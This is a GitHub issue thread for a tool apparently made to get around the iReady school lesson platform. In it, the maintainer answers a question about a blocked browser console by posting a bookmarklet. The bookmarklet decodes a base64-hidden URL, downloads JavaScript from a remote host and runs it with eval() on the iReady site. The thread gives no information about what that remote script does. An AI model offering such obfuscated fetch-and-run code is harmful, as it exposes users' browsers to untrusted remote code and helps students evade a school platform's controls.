### ISSUE TITLE
issue

### ISSUE THREAD

**Issue by Ireadycoder** [cupiditys/iReady-Overload#59]
so, my friends having the problem where it's telling you to hit the green arrow or ask your teacher for help. but they blocked the console where it pauses your screen and won't let you paste it in there at the same time being on the lesson.

**Comment by cupiditys** [comment]
use it as a bookmarklet instead then

**Comment by Ireadycoder** [comment]
you cant paste the code tho? has nothing to do with extension.

**Comment by Ireadycoder** [comment]
just when you open console it pauses iready lesson

**Comment by cupiditys** [comment]
> just when you open console it pauses iready lesson

yea then dont open console

``fetch(atob('aHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vY3VwaWRpdHlzL3Jhdy91cGxvYWQvdjE2MzkxOTI0MTQvc19qMnU5ZnMuanM')).then((res) => res.text().then((t) => eval(t)))``

paste this into bookmark thing like you'd do with the extension, click it when ur at the home screen or whatever

**Comment by Ireadycoder** [comment]
ohh ok man my fault thanks.
